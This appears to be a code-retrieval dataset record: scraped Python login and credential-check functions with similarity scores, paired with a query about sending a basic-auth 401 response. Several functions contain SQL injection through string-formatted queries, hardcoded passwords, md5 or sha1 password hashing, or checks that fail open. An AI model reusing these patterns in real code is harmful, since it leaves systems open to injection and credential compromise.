[ "def check_auth(username, password, expected_user, expected_pw):\n return username == expected_user and password == expected_pw", "def validate_authentication(self, username, password):\n return self.user_table[username]['pwd'] == password", "def check_auth(username, password):\n return username == USERNAME and password == PASSWORD", "def check_valid(self, username, password):\n con = self.connect()\n cursor = con.cursor()\n cursor.execute(\"SELECT username,password \\\n FROM users WHERE username = %s\", (username,))\n credentials = cursor.fetchone()\n cursor.close()\n con.commit()\n con.close()\n if credentials is None:\n return False\n if username != credentials[0]:\n return False\n if sha256_crypt.verify(password, credentials[1]):\n return True\n return False", "def check_auth(username, password):\n return username == 'aweber' and password == 'aweber1100'", "def check_auth(username, password):\n return username == 'nicholas' and password == ADMIN_PASS", "def check_auth(username, password):\n return username == 'admin' and password == 'worcester'", "def validate_login(self, username, password):\n user = User(self).get(username)\n return user and user['Password'] == password", "def check_auth(username, password):\n return username == 'admin' and password == 'pebble'", "def check_auth(username, password):\n return username == 'jeffkoons' and password == 'likesweirdbaloons'", "def check_auth(username, password):\n return username == 'admin' and password == 'Passw0rd'", "def check_auth(username, password):\n return username == 'asimov' and password == 'tagada72'", "def check_auth(username, password):\n return username == 'sammy' and password == 'BasicPassword!'", "def is_valid_password(password, username):\n import string\n if len(password) < 4 or ' ' in password:\n return False\n if username:\n if string.lower(username) in string.lower(password):\n return False\n return True", "def check_auth_password(self, username, password):\n return AUTH_FAILED", "def check_auth(username, password):\n return username == app.config['USERNAME'] and (\n password == app.config['PASSWORD'])", "def check_auth(username, password):\n return username == 'admin' and password == 'password'", "def _credentials_are_valid(self, username, password):\n LDAP_SERVER = 'ldap://xxx.xxx.xxx' # EDIT THIS\n LDAP_USERNAME = '%s@xxx.com' % username # EDIT THIS\n LDAP_PASSWORD = password\n\n try:\n # build a client\n ldap_client = ldap.initialize(LDAP_SERVER)\n # perform a synchronous bind\n ldap_client.set_option(ldap.OPT_REFERRALS, 0)\n ldap_client.simple_bind_s(LDAP_USERNAME, LDAP_PASSWORD)\n except ldap.INVALID_CREDENTIALS:\n ldap_client.unbind()\n # Wrong username or password\n return False\n except ldap.SERVER_DOWN:\n # AD server not available\n return False\n # all is well\n ldap_client.unbind()\n # Login successful\n return True", "def username_is_valid(username):\n\n if len(username) < MINIMUM_PASSWORD_LENGTH:\n return False\n else:\n return True", "def check_auth(username, password):\n return username == c.id and password == c.pw", "def check_auth(username, password):\n return username == 'admin' and password == 'root'", "def check_auth(username, password):\n return username == 'admin' and password == 'secret'", "def check_auth(username, password):\n return username == 'admin' and password == 'secret'", "def password_validator(username, password):\n digits = re.search(r'\\d+', password)\n capital_letters = re.search(r'[A-Z]+', password)\n lenght = len(password) > PASSWORD_MIN_LENGTH\n special_symbol = 
re.search(r'[\\-\\/\\@\\?\\!\\,\\.\\#\\&\\*]+', password)\n\n statement = digits and capital_letters and lenght and special_symbol\n\n if statement:\n return True\n return False", "def check_auth(username, password):\n return username == 'admin' and password == 'admin'", "def check_auth(username, password):\n ADMIN_USER = config.CONFIG_VARS['ADMIN_USER']\n ADMIN_PASS = config.CONFIG_VARS['ADMIN_PASS']\n return username == ADMIN_USER and password == ADMIN_PASS", "def check_auth(username, password):\n # return username == app.config['USER'] and password == app.config['PASS']\n\n return username == app.config['USER'] and password == app.config['PASS']", "def check_auth(username, password):\r\n return username == current_app.config['ADMIN_USERNAME'] \\\r\n and password == current_app.config['ADMIN_PASSWORD']", "def check_credentials(username, password):\n if not validate_username(username) or not validate_password(password):\n return False\n sql = \"SELECT password \" \\\n \"FROM users \" \\\n \"WHERE username=:username AND is_active=TRUE\"\n result = db.session.execute(sql, {\"username\": username})\n user = result.fetchone()\n if user is None:\n return False\n password_hash = user[0]\n if check_password_hash(password_hash, password):\n return True\n return False", "def is_logged_in_user_valid(user_name, password):\n if user_name.upper() == \"HELLO\" and password == \"World\":\n return True # User input matches user name and password.\n else:\n return False # User input does not match user name and password.s", "def check_auth(username, password):\n\n config = get_app_configurations()\n\n with open(config[\"credentials\"], \"r\") as fh:\n u, p = fh.readline().rstrip().split(\",\")\n\n return username == u and password == p", "def verify_pw(username, password):\n credentials = HtpasswdFile(app.config[\"CREDENTIAL_FILE\"])\n if not credentials.check_password(username, password):\n logging.warning(\"%s tried to login with wrong password\", username)\n return False\n return True", "def check_auth(username, password):\n return password == os.getenv('PASSWORD')", "def validate_user(self, username, password, client, request, *args, **kwargs):\n log.debug('Validating username %r and its password', username)\n if self._usergetter is not None:\n user = self._usergetter(username, password, client, request, *args, **kwargs)\n if user:\n log.debug('Successfully validated username %r', username)\n request.user = user\n return True\n return False\n log.debug('Password credential authorization is disabled.')\n return False", "def _validate_password_works_with_username(password, username=None):\n if password == username:\n raise errors.AccountPasswordInvalid(accounts.PASSWORD_CANT_EQUAL_USERNAME_MSG) # lint-amnesty, pylint: disable=no-member", "def check_auth(username, password):\n return username == os.environ['USERNAME'] and password == os.environ['PASSWORD']", "def is_valid_login(self, username, password):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_IS_LOGIN_INFORMATION_VALID, username + '|' + password)", "def authenticate(self):\n rv = Form.validate(self)\n if not rv:\n return False\n\n user = self.username.data\n\n cur = get_cursor()\n if email_exists(cur, user):\n user = get_username(cur, user)\n\n if username_exists(cur, user):\n pw_hash = get_pw_hash(cur, user)\n\n if check_password(self.password.data, pw_hash):\n self.username.data = user\n return True\n\n return False", "def is_valid_user(self, username, password): # WORKS\n done1 = self.cur.execute(\"SELECT password FROM users 
WHERE username=\\\"{}\\\"\".format(username))\n done2 = self.cur.execute(\"SELECT username FROM admins WHERE username=\\\"{}\\\"\".format(username))\n if done1 == 0 and done2 == 0: # If both queries are unsuccessful, username doesn't exist in both tables.\n return False\n else:\n if done1 == 1: # If username exists in USERS table.\n self.cur.execute(\"SELECT password FROM users WHERE username=\\\"{}\\\"\".format(username))\n stored_password = self.cur.fetchone()[0]\n return check_password_hash(stored_password, password) # Returns True if the hashes match.\n else: # If username exists in ADMINS table.\n self.cur.execute(\"SELECT password FROM admins WHERE username=\\\"{}\\\"\".format(username))\n stored_password = self.cur.fetchone()[0]\n return check_password_hash(stored_password, password) # Returns True if the hashes match.", "def check_user(self,username, password):\n safe_input = (username, password)\n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=? AND Password=?\",safe_input).fetchone()\n if vals:\n logging.info('%s was authenticated', username)\n return True\n else:\n logging.info('Failed login for %s', username)\n return False", "def valid_login(username, password):\n db = get_db()\n db.ping(True)\n cur = db.cursor()\n\n try:\n sql = \"SELECT password FROM users WHERE user_name = '{}';\".format(username)\n cur.execute(sql)\n for i in cur:\n return check_password_hash(i[0], password)\n return False\n except mysql.connector.Error as err:\n flash(err, \"set\")\n return False\n finally:\n cur.close()\n db.close()", "def check_credentials(self, username, password):\n user = None\n if username != \"\":\n # Calling DB and fetching userdetails\n user = userdetails_API_query(username)\n print \"id \", user['_id']\n if user != None:\n #u = app.config['BASIC_AUTH_USERNAME'] = user['username']\n #pwd = app.config['BASIC_AUTH_PASSWORD'] = user['pw_hash']\n # print \" u & pwd\",username\n if user['username'] == username and check_password_hash(user['pw_hash'], password):\n g.user = user['_id'], username, user['email']\n return True\n print \"g.user\", g.user\n return False", "def test_credentials(self):\r\n data = self._deep_clean('zekebarge@gmail.com')\r\n error = data.get(ERROR_CODE, None)\r\n if error in (1,2):\r\n raise InvalidCredentialsError(\"Credentials are invalid for user '{}'\".format(self._username))\r\n return True", "def check_auth(username, password):\n return get_ct_object(username, password) is not None", "def check_user(self):\n try:\n if (self.get_user()[0][0] == self.username) and (self.check_password(self.password)):\n return True\n else:\n return False\n except:\n return False", "def check_auth(username, password):\n return username == 'daniel' and password == config['redis_auth_key']", "def validate_authentication(self, username, password, handler):\n hash = md5(password).hexdigest()\n msg = \"Authentication failed.\"\n if not self.has_user(username):\n if username == 'anonymous':\n msg = \"Anonymous access not allowed.\"\n raise AuthenticationFailed(msg)\n if username != 'anonymous':\n if self.user_table[username]['pwd'] != hash:\n raise AuthenticationFailed(msg)", "def is_correct_user(self, login, password):\n pass", "def check_auth(username, password):\n return username == get_env('UPLOAD_USER') and password == get_env('UPLOAD_PASSWORD')", "def verify_password(self, username, password):\n\n try:\n self.c.execute('SELECT password FROM profiles WHERE name=(?)', (username,))\n\n db_pw = self.c.fetchone()[0]\n print(password)\n\n return db_pw 
== password\n\n except TypeError:\n return False", "def check_credentials(username, password):\n\n return db.auth_user(username, password)", "def check_auth(_, http_password):\n return (password is not None) and (password == http_password)", "def check_user(self, username, password):\n user = [user for user in self.db if user['username'] == username]\n if user:\n if check_password_hash(user[0][\"password\"], password):\n return True\n return False\n return False", "def validate(self) -> bool:\n if not super().validate():\n return False\n\n # Does the user exist\n user = User.query.filter_by(username=self.username.data).first()\n if not user:\n self.username.errors.append('Invalid username or password')\n return False\n\n # Does given password match user's password\n if not user.check_password(self.password.data):\n self.username.errors.append('Invalid username or password')\n return False\n\n return True", "def check_credentials(username, password):\n\t\n\tconn = sqlite3.connect('db/user_task.db')\n\tcursor = conn.execute(\"SELECT password from user WHERE username == \\'%s\\'\" % (username))\n\tdata = cursor.fetchall()\n\tconn.close()\n\n\tif len(data) == 0:\n\t\treturn u\"Incorrect username\"\n\n\tfor row in data:\n\t\tencoded_password = hashlib.sha1(password.encode('utf-8')).hexdigest()\n\t\tif row[0] == encoded_password:\n\t\t\treturn None\n\n\treturn u\"Incorrect password\"\n\t\n\t# An example implementation which uses an ORM could be:\n\t# u = User.get(username)\n\t# if u is None:\n\t# return u\"Username %s is unknown to me.\" % username\n\t# if u.password != md5.new(password).hexdigest():\n\t# return u\"Incorrect password\"", "def check_auth(username, password):\n try:\n locust_username = os.environ['LOCUST_USER_NAME']\n locust_password = os.environ['LOCUST_PASSWORD']\n return username == locust_username and password == locust_password\n except:\n return True", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def _check_user_pass(self):\n if not self.username:\n self.username = input(' 请输入手机号:')\n if self.username.isdigit() and '+86' not in self.username:\n self.username = '+86' + self.username\n\n if not self.password:\n self.password = input(' 请输入密码:')", "def check_password(self, username, password): # tested\r\n conn = self.get_db()\r\n with conn:\r\n c = conn.cursor()\r\n sql = ('select password from gameuser where username=%s')\r\n c.execute(sql,(username,))\r\n hashedpass = md5.new(password).hexdigest()\r\n u = c.fetchone()\r\n if u == None:\r\n raise NoUserExistsException(username)\r\n # print 'database contains {}, entered password was {}'.format(u[0],hashedpass)\r\n return u[0] == hashedpass", "def valid_login_password(username, password, pw_hash):\n salt = pw_hash.split(',')[1]\n return pw_hash == make_pw_hash(username, password, salt)", "def check_auth(username, password):\n return username == 'admin' and password in app.config[\"CLAIM_SECRETS\"]", "def validate_password(self, field):\n username = self.username.data\n if platform.system().lower() == 'linux':\n g.logger.debug('use pam for authenticate.')\n from pam import authenticate\n if authenticate(username, field.data):\n g.logger.info('session opened for user %s.' 
% username)\n return username\n else:\n raise ValueError('Authentication failure.')\n return username", "def check_credentials_typo(credentials):\n regex_username = r'^[\\w\\.\\-]{2,}$'\n regex_password = r'[^.]{4,10}$'\n\n if not match(regex_username, credentials['username']):\n raise ValueError('invalid username typo')\n\n if not match(regex_password, credentials['password']):\n raise ValueError('invalid password typo')", "def username_and_password_check(username: str, password: str) -> bool:\n table = metadata.tables['users']\n s = select(\n [\n func.count(table.c.id)\n ]).where(tuple_(table.c['username'], table.c['password'])\n .in_([(username, password)]))\n result = conn.execute(s).scalar()\n return bool(result)", "def check_auth(username, password):\n user = User.query.filter(User.username == username).first()\n\n if user:\n return user.password == password\n else:\n return False", "def verify_password(username, password):\n if username in user_auth and check_password_hash(user_auth.get(username), password):\n return username", "def authentication_validation(username, password, access_token):\n if bool(username) is not bool(password):\n raise Exception(\"Basic authentication requires a username AND\" \" password.\")\n if (username and access_token) or (password and access_token):\n raise Exception(\n \"Cannot use both Basic Authentication and\"\n \" OAuth2.0. Please use only one authentication\"\n \" method.\"\n )", "def invalid_credentials( form , field ): \n\tusername_entered = form.username.data\n\tpassword_entered = field.data \n\tuser_object = User.query.filter_by(username = username_entered).first()\n\tif user_object is None : \n\t\traise ValidationError(\"Username or Password is incorrect !\")\n\telif not pbkdf2_sha256.verify(password_entered , user_object.password) : \n\t\traise ValidationError(\"Username or Password is incorrect !\")", "def is_password_valid(password):\n #TODO : This should also be handled by the front_end\n pass", "def check_password(username, password, htpasswd_fn):\n entries = parse_htpasswd(htpasswd_fn, username)\n if not entries.has_key(username):\n raise NoSuchUser('No user: %r' % username)\n return check_entry_password(\n username, password, entries[username])", "def auth(username, password):\n return username == password", "def _check_password(self, password):\n if self.password_regex.search(password) is not None:\n print(\"Correct password\")\n return True\n else:\n print(\"Wrong password\")\n return False", "def check_auth(username, password):\n return username == current_app.config['DOC_USERNAME'] and password == current_app.config['DOC_PASSWORD']", "def _check_username(self, username):\n if self.username_regex.search(username) is not None:\n print(\"Correct username\")\n return True\n else: \n print(\"Wrong username\")\n return False", "def check_auth_password(self, username, password):\n if username == self.username and password == self.password:\n return paramiko.AUTH_SUCCESSFUL\n return paramiko.AUTH_FAILED", "def check_credentials(input_password, real_password):\n return pwd_context.verify(input_password, real_password)", "def test_valid_username_invalid_password(self):\n response = self.client.post(reverse('users:login'), {'username': self.user['username'], 'password': '1sfsdf'})\n self.assertEqual(response.status_code, 200)\n self.assertFormError(response, 'form', None, ERROR_MSG)", "def authorise_login(self, username, password):\n con = self.connect()\n cursor = con.cursor()\n cursor.execute(\"SELECT username,password \\\n FROM users 
WHERE password = %s\", (password,))\n credentials = cursor.fetchone()\n cursor.close()\n con.commit()\n con.close()\n if credentials is None:\n return False\n if username != credentials[0]:\n return False\n if password != credentials[1]:\n return False\n return True", "def clean(self):\n cleaned_data = super().clean()\n username = cleaned_data['username']\n password = cleaned_data['password']\n\n if authenticate(username=username, password=password) is None:\n raise ValidationError('Your username or password is incorrect.')", "def _check_password(self, password):\n rule = re.compile(constant.password_regex)\n if not rule.match(password):\n return False\n # disallow password from azure guide, yes, it's hard code.\n disallowed = constant.password_disallowed\n return password not in disallowed", "def validate(username: str, password: str) -> dict:\n validation_check = {}\n \n # Check to see if the username was left blank\n if username.strip() == \"\":\n validation_check[\"success\"] = False\n validation_check[\"username\"] = \"Username cannot be left blank.\"\n\n # Check to see if the username is taken\n elif not sql.is_username_taken(username):\n validation_check[\"success\"] = False\n validation_check[\"username\"] = \"Username is incorrect\"\n\n # Check to see if the password was left blank\n if password.strip() == \"\":\n validation_check[\"success\"] = False\n validation_check[\"password\"] = \"Password cannot be left blank.\"\n\n\n if not validation_check.get(\"success\", True):\n return validation_check\n\n else:\n return sql.verify_credentials(username, password)", "def check_friend(self, username):\n if (self.isBlank(username) or self.isValidLen(username)):\n return False\n\n safe_input = (username,)\n \n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=?\" ,safe_input).fetchone()\n if vals:\n return True\n else:\n return False", "def test_check_password():\n assert check_password('Longpassword') == False\n assert check_password('123456') == False\n assert check_password('short') == False\n assert check_password('C0rect') == False\n assert check_password('Correct8') == True", "def check_password(self, password):\n return self.password == password", "def test_validate_credentials(self):\n pass", "def check_my_users(user):\n user_data = my_users.get(user['username'])\n if not user_data:\n return False # <--- invalid credentials\n elif user_data.get('password') == user['password']:\n return True # <--- user is logged in!\n\n return False # <--- invalid credentials", "def valid_login(username: str, password: str):\n\n try:\n LoginHandler.login(username, password)\n global validLogin\n validLogin = True\n except:\n validLogin = False", "def checkLogin(username, password):\n\n # Query database for username\n cur = initialise(2)\n cur.execute(\"SELECT * FROM users WHERE username = ?\", [username])\n users = cur.fetchall()\n\n # Ensure username exists and password is correct\n if len(users) != 1 or not check_password_hash(users[0][\"hash\"], password):\n return False, username\n else:\n return True, users[0][\"id\"]", "def validate_login(name,password):\n\t\n\t#Read the attendance excelsheet check if username and password matched\n\tdf_atten=pd.read_csv(\"datasrc/People.csv\")\n\t# 10006 ultbjxu\n\t\n\tif (df_atten.Username.astype(str).str.contains(name).any() and df_atten.Password.astype(str).str.contains(password).any()):\t\t\n\t\treturn True\n\telse: \n\t\treturn False", "def isUSER(username, password):\n usr = UserData[\"username\"].to_dict()\n listofUsers = 
list(UserData[\"username\"])\n if username in listofUsers:\n # print('Is a User')\n getindex = listofUsers.index(username)\n listofPasswords = list(UserData[\"password\"])\n # print(getindex)\n if listofPasswords[getindex] == password:\n # print('Password Correct')\n return True, True\n return True, False\n return False, False", "def _input(self):\n\t\tself.username = input(\"Username:\")\n\t\tself.password = input(\"password:\")\n\t\tret = re.match(r\"^\\w{1,20}$\", self.username)\n\t\tprint(\"------>input string\", self.username)\n\t\tprint(\"------>matched string\",ret)\t\n\t\ttime.sleep(1)\n\t\tif ret == None:\n\t\t\treturn True\n\t\telse:\n\t\t\tpass\n\n\t\tsql = f\"\"\"select name, password from users where name='{self.username}';\"\"\"\n\t\tprint(\"----------->\", sql)\n\t\ttime.sleep(1)\n\t\tcount = self.cs.execute(sql)\n\t\tprint(count)\n\t\tif (self.username, self.password) == self.cs.fetchone():\n\t\t\tprint(\"Login Successfully\")\n\t\t\ttime.sleep(1)\n\t\t\treturn False\n\t\telse:\n\t\t\tprint(\"Wrong username or password\")\n\t\t\ttime.sleep(1)\n\t\t\treturn True", "def is_valid_login(username, password):\n with open(PASSFILE, \"r\") as passfile:\n for record in passfile:\n try:\n valid_user, valid_password = False, False\n r_username, r_salt_hash = record.split()\n if username == r_username:\n valid_user = True\n if sha256_crypt.verify(password, r_salt_hash):\n valid_password = True\n if valid_user and valid_password:\n return True\n except ValueError:\n pass\n return False", "def check_auth(username, password):\n session.pop('username', None)\n session.pop('password', None)\n session['username'] = username\n session['password'] = password\n # Test if we can connect to a region\n connect_to_region()\n return True", "def check_credentials_validation(credentials):\n spec = {'_id': credentials['username'], 'password': credentials['password']}\n if not current_app.mongo.observer.users.find_one(spec):\n raise Unauthorized('invalid credentials')", "def username_check(username):\n\n try: \n pwd.getpwnam(username)\n print(\"User %s DOES EXIST. Try a different username.\" % (username)) \n return False\n\n except KeyError: \n print(\"User %s DOES NOT exist. Continuing...\" % (username)) \n return True", "def test_invalid_username_valid_password(self):\n response = self.client.post(reverse('users:login'), {'username': 'xyzabe', 'password': self.user['password1']})\n self.assertEqual(response.status_code, 200)\n self.assertFormError(response, 'form', None, ERROR_MSG)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def authenticate(username, password):\n test = User.load(username)\n test_password = test.password\n input_password = md5.new(\n password + config.get('security', 'salt')).digest()\n if input_password == test_password:\n return True\n else:\n return False", "def test_authenticate_invalid_username(self):\r\n print(\"Authenticate user invalid username\")\r\n username = \"test9999user\"\r\n password = \"password\"\r\n\r\n self.assertEqual(self.system.authenticate(username, password), False)", "def verify_pw(username, password):\n global password_store\n logger = logging.getLogger('verify_pw')\n if not password_store:\n logger.error(\"No password store specified\")\n return False\n logger.debug(\"Verifying password for %s\" % username)\n return password_store.verify(username, password)" ]
[ "0.82211864", "0.8146436", "0.7975914", "0.7962432", "0.7885527", "0.78588223", "0.78382313", "0.78288996", "0.7815222", "0.7798579", "0.77856815", "0.77700555", "0.7760794", "0.7754975", "0.77548647", "0.7750886", "0.7749223", "0.77322245", "0.7715806", "0.7685904", "0.7673684", "0.766307", "0.766307", "0.76620096", "0.76567376", "0.7652723", "0.765255", "0.7611541", "0.75952524", "0.7564781", "0.7557824", "0.7547461", "0.75408834", "0.75314397", "0.7506924", "0.75042623", "0.74691737", "0.7442317", "0.741009", "0.740618", "0.73972464", "0.7394501", "0.7389306", "0.73495054", "0.7336364", "0.7299509", "0.7276375", "0.7247304", "0.7230579", "0.7205749", "0.7199119", "0.71977973", "0.7193516", "0.71885014", "0.71854734", "0.71695465", "0.7169254", "0.7159132", "0.7140503", "0.7135009", "0.71116257", "0.7110569", "0.7108786", "0.709969", "0.7093436", "0.7031712", "0.7030077", "0.7026029", "0.7025823", "0.69905216", "0.6989299", "0.69882464", "0.69840413", "0.696945", "0.69658744", "0.69613117", "0.6940676", "0.6931497", "0.6914118", "0.6901826", "0.68954366", "0.68901163", "0.68864787", "0.6883074", "0.68827283", "0.68799317", "0.68769723", "0.68669415", "0.6864661", "0.68634623", "0.68553925", "0.6848534", "0.6846545", "0.6840525", "0.6836461", "0.6829205", "0.6827091", "0.682658", "0.68223697", "0.6813599" ]
0.7687129
19
Sends a 401 response that enables basic auth
def authenticate(): return Response(render_template('index.html', auth=False), 401, {'WWW-Authenticate': 'Basic realm="Login Required"'})
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def authenticate():\n return Response('Not Authorized', 401, {'WWW-Authenticate': 'Basic realm=\"api\"'})", "def authenticate():\n return Response(\n '', 401, {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate(self):\n abort(\n 401,\n description=self.exception,\n www_authenticate=(\"WWW-Authenticate\", 'Basic realm=\"%s\"' % __package__),\n )", "def authenticate():\n return Response(\n 'Could not verify your credentials for that url', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\r\n return Response(\r\n 'Could not verify your access level for that URL.\\n'\r\n 'You have to login with proper credentials', 401,\r\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n 
{'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n\treturn Response(\n\t'Could not verify your access level for that URL.\\n'\n\t'You have to login with proper credentials', 401,\n\t{'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n 
{'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response('Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials',\n 401,\n {\n 'WWW-Authenticate': 'Basic realm=\"Login Required\"'\n }\n )", "def authenticate():\n return send_msg(\n 401,\n 'Must be connected',\n headers={'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return flask.Response('Login required.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL, need token.\\n', 403,\n {'WWW-Authenticate': 'Basic realm=\"token Required\"'})", "def authenticate(self):\n return Response(\n 'Could not verify your access level for that URL.\\nYou have to login with proper credentials',\n 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def user_must_authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with Web Manager credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def unauthorized():\n return HttpError(401)", "def basic_auth_error():\n logger.debug(\"Basic authentication failed.\")\n return unauthorized(\"Invalid credentials.\")", "def response_unauthorised():\n\n response = {\n 'status': 'failed',\n 'error': 'Not Authorised'\n }\n\n return response_json(response, status=401)", "def challenge(self, environ, status, app_headers=(), forget_headers=()):\n resp = Response()\n resp.status = 401\n resp.headers = self.forget(environ, {})\n for headers in (app_headers, forget_headers):\n for name, value in headers:\n resp.headers[name] = value\n resp.content_type = \"text/plain\"\n resp.body = \"Unauthorized\"\n return resp", "def authenticate(self):\n resp = Response(None, 401)\n abort(401, description='Please provide proper credentials', response=resp)", "def _login(self, environ, start_response):\n response = HTTPUnauthorized()\n response.www_authenticate = ('Basic', {'realm': self._realm})\n return response(environ, start_response)", "def add_basic_auth(blueprint: Blueprint, username, password, realm='api'):\n\n @blueprint.before_request\n def basic_http_auth(*args, **kwargs):\n auth = request.authorization\n if auth is None or auth.password != password or auth.username != username:\n return Response('Please login', 401, {'WWW-Authenticate': f'Basic realm=\"{realm}\"'})", "def authenticate():\n return abort(401)", "def unauthorized():\n return {'errors': ['Unauthorized']}, 401", "def forget(self, request):\n return [('WWW-Authenticate', 'Basic realm=\"%s\"' % self.realm)]", "def 
